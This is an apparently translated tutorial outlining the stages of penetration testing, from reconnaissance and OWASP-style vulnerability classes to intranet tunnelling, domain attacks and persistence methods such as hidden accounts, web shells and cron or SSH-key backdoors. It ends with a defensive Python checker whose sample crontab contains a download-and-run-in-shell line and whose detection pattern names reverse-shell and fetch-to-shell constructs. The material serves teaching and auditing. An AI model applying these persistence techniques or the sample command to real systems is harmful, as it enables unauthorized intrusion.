Introduction to Penetration Testing
Penetration testing simulates an attacker's intrusion into a system: the tester penetrates the system step by step and uncovers its weak links and hidden risks. Finally a test report is produced and handed to the system owner, who can harden the system according to the report, improve its security and keep real attackers out.
The precondition for penetration testing is authorization by the system owner!
Penetration testing without authorization is illegal!
Significance of penetration testing
An important method of information security assessment, which helps grasp the overall security strength of a system.
Simulates hacker attacks and hacker thinking to assess potential computer risks.
Discovers system weaknesses and exploitable paths so they can be prevented in advance.
With authorization, there is no risk of intrusion.
Penetration Testing Methodology
-- White box testing
Testing performed when the overall information and source code of the target are known, similar to a code audit.
-- Black box testing
Only the target is known and all other information is unknown, fully simulating a hacker attack.
-- Gray box testing
Part of the target's information, such as its architecture and network topology, is known, and testing proceeds from there.
(By other criteria, testing can also be divided into manual testing and automated testing.)
General process of penetration testing
Preparation stage -> Information collection -> Vulnerability detection -> Vulnerability exploitation -> Intranet forwarding -> Intranet penetration -> Trace removal -> Report writing
--Preparation Phase
Obtain authorization, develop a plan, determine objectives, determine the test environment, determine test scope and depth, determine the test time, and manage test risks.
--Information collection
Two methods of information collection
Active information collection: access or scan the target directly.
Passive information collection: gather information about the target through third parties.
Main information to collect
1. Domain name information: IP, subdomains, DNS records, and whether a CDN is in use. Tools for subdomain collection: Layer subdomain digger, findmain, etc.
2. Public network information about the target: employee information, email addresses, registrant, etc.; search code hosting platforms such as GitHub for sensitive information.
3. Website fingerprinting: server type (Windows/Linux), website container (Apache/Nginx/Tomcat/IIS), script type (php/jsp/asp/aspx), database type (mysql/oracle/access/sqlserver/redis).
4. Open server ports. Tools such as nmap and Yujian can be used. Typical port/weakness pairs: SSH weak password 22, MySQL weak password 3306, Redis unauthorized access 6379, WebLogic deserialization vulnerability 7001, web middleware vulnerabilities 80.
5. Sensitive directories. Yujian, wwwscan, dirmap, etc. can be used to scan for the admin (background) directory and default paths.
6. Side sites and the C segment
Side sites are other websites hosted on the same server; a side site can be used as a way in.
The C segment refers to other servers in the same network segment. Infiltrate and escalate privileges on a server in the target's C segment, then pivot to the target.
Common scanning tools: Nessus, X-SCAN, Nmap
--Vulnerability detection
Mainly based on the OWASP Top 10
1. Injection: SQL injection, XXE injection, LDAP injection, system command injection, remote code execution
2. Broken authentication and session management: weak-password brute forcing, cookie forgery and cookie bypass, logic bypass of login, session hijacking
3. Cross-site scripting (XSS)
4. Broken access control: unauthorized access, privilege bypass (horizontal and vertical), file operations (file upload, file inclusion, arbitrary file download)
5. Security misconfiguration: high-risk ports (22, 445, 3389, 6379), database, web middleware, CORS cross-origin resource sharing vulnerabilities, directory vulnerabilities
6. Sensitive information leakage: weak files (phpinfo, backup files, installation files), source code, configuration files, database files
7. Insufficient attack detection and prevention: WAF, RASP, virtual/real patches
8. Cross-site request forgery (CSRF)
9. Using components with known vulnerabilities: Struts2 code execution, Spring code execution, Java deserialization, Heartbleed
10. Unprotected APIs: web services, login API, APP API, DB API, pay API
Vulnerability detection ideas
1. Injection vulnerabilities
2. File vulnerabilities
3. Cross-site vulnerabilities
4. Configuration vulnerabilities (SSRF, CORS, JSONP, XSS, CSRF)
5. Deserialization vulnerabilities (fastjson, JBoss, Apache Shiro, WebLogic deserialization)
6. Logic vulnerabilities (may exist in functions such as registration, login and password modification)
7. Server vulnerabilities: for JBoss/Apache/IIS/WebLogic/Tomcat, vulnerabilities can be detected from the server's version number and sensitive file paths.
8. Third-party library vulnerabilities, such as fastjson, Struts2, jQuery, OpenSSL
-- Intranet forwarding
Concept: in a traditional network, the firewall is a physical boundary defense that divides the network into an internal network and an external network.
After obtaining some permissions on an external-network server (a web server, FTP server, mail server, etc.), we may find that this server can directly or indirectly reach the internal network, while hosts in the internal network cannot be reached directly from outside. The external server can then be turned into a proxy through port forwarding (a tunnel). This process is intranet forwarding.
port forwarding
Intranet Forwarding Ideas
Intranet forwarding usually starts by determining whether the host on which access has been obtained can reach the outside network. If the target can reach the outside, a reverse proxy can be used; if it cannot, consider a forward tunnel or port multiplexing.
Intranet forwarding methods
1. reGeorg combined with a proxychains proxy chain (HTTP tunnel)
Applicable when the public-network server only exposes port 80; uses an HTTP tunnel.
2. EW (EarthWorm) combined with a proxychains proxy chain.
EW is a portable network penetration tool with two core functions: setting up a SOCKS5 service and port forwarding. It can open a network tunnel into the intranet in "forward", "reverse", "multi-level cascade" and other modes.
3. LCX (a socket-based port forwarding tool) implements port forwarding.
--Intranet penetration
Common attack methods
non-domain environment
MS17-010
pass the hash attack
Access Token Stealing and Exploitation
mimikatz to obtain RDP credentials
........
domain environment
MS14-068
pass-the-ticket attack
AS-REP Roasting Attack
Kerberoast attack
........
--Privilege maintenance in intranet penetration
Web backdoors
1. Hidden backdoor files
2. Undead shells
3. 404-page hidden backdoors, or other backdoors that carry their own files
Windows system
1. Hidden user: append $ to the user name
2. Place Trojan files in the startup directory
3. Use tools, such as the persistence module in MSF
4. Remote desktop session maintenance
Linux system
1. SSH backdoor
2. crontab scheduled task
3. SSH public key
4. Create a user with UID=0
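The Linux persistence techniques just listed each leave a host-local trace that the system owner can audit after a test. The following added example (not part of the original notes) checks constructed /etc/passwd, crontab and authorized_keys content for the corresponding indicators: extra UID-0 accounts, cron jobs that pipe downloaded content into a shell, and SSH keys outside an approved set; all sample data and the approved-key set are constructed for illustration.

```python
import re

# Constructed sample /etc/passwd: a second UID-0 account ("backup") hidden among normal users.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:0:0:backup:/root:/bin/bash
alice:x:1000:1000:alice:/home/alice:/bin/bash
"""
# Constructed sample crontab: the second job downloads a script and pipes it into a shell.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/local/bin/logrotate-wrapper
*/5 * * * * curl -s http://203.0.113.10/x.sh | sh
"""
# Constructed sample authorized_keys plus the (constructed) set of key blobs the owner approved.
SAMPLE_AUTH_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyAlice alice@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQexampleunknown nobody@nowhere
"""
APPROVED_KEY_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyAlice"}


def extra_uid0_accounts(passwd_text):
    """Names of accounts with UID 0 other than root (Linux item 4 above)."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")          # name:passwd:uid:gid:gecos:home:shell
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


# Patterns typical of a cron-based backdoor: remote download piped to a shell,
# base64-decoded payloads, or bash /dev/tcp reverse connections.
SUSPICIOUS_CRON = re.compile(r"(curl|wget)[^|]*\|\s*(sh|bash)\b|base64\s+-d|/dev/tcp/")


def suspicious_cron_entries(crontab_text):
    """Non-comment crontab lines matching SUSPICIOUS_CRON (Linux item 2 above)."""
    return [line for line in crontab_text.splitlines()
            if line and not line.startswith("#") and SUSPICIOUS_CRON.search(line)]


def unapproved_keys(auth_keys_text, approved_blobs):
    """Comment (or blob) of each authorized_keys entry not in the approved set (Linux item 3)."""
    unknown = []
    for line in auth_keys_text.splitlines():
        parts = line.split()              # type blob [comment]
        if len(parts) >= 2 and parts[1] not in approved_blobs:
            unknown.append(parts[2] if len(parts) > 2 else parts[1])
    return unknown
```

On a real host the same functions can be fed the contents of /etc/passwd, each user's crontab and each ~/.ssh/authorized_keys; the approved-key set would come from the owner's key inventory.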